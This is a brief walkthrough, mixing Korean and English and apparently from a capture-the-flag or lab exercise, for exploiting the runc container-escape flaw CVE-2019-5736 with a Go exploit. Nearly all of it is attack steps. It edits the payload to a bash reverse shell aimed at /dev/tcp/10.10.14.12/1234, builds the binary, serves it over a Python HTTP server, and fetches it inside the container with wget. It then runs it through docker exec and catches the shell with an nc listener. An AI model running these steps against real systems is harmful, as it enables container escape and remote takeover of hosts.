
Go 기반 익스플로잇 for CVE-2019-5736 (Runc 컨테이너 이스케이프) with 사용자 지정 가능한 리버스 셸 페이로드, designed for 취약한 Docker 컨테이너를 대상으로 하는 침투 테스트 및 레드팀 작전용.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
해당 시스템은 CVE-2019-5736에 취약합니다. Runc 익스플로잇 (CVE-2019-5736)의 단계를 따르세요. main.go 파일을 다운로드하고, 파일 내 페이로드를 다음과 같이 변경하세요:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
그 후, 실행:
go build main.go
HTTP 서버 호스팅:
python3 -m http.server

그런 다음 아래와 같이 3개의 터미널을 엽니다:

터미널 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
터미널 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
터미널 3
nc -nlvp 1234
첫 번째 SSH 터미널에서 ./main을 실행한 직후 두 번째 SSH 터미널에서 두 번째 명령을 실행하면, 터미널 3에서 netcat 리버스 셸을 얻을 수 있습니다.

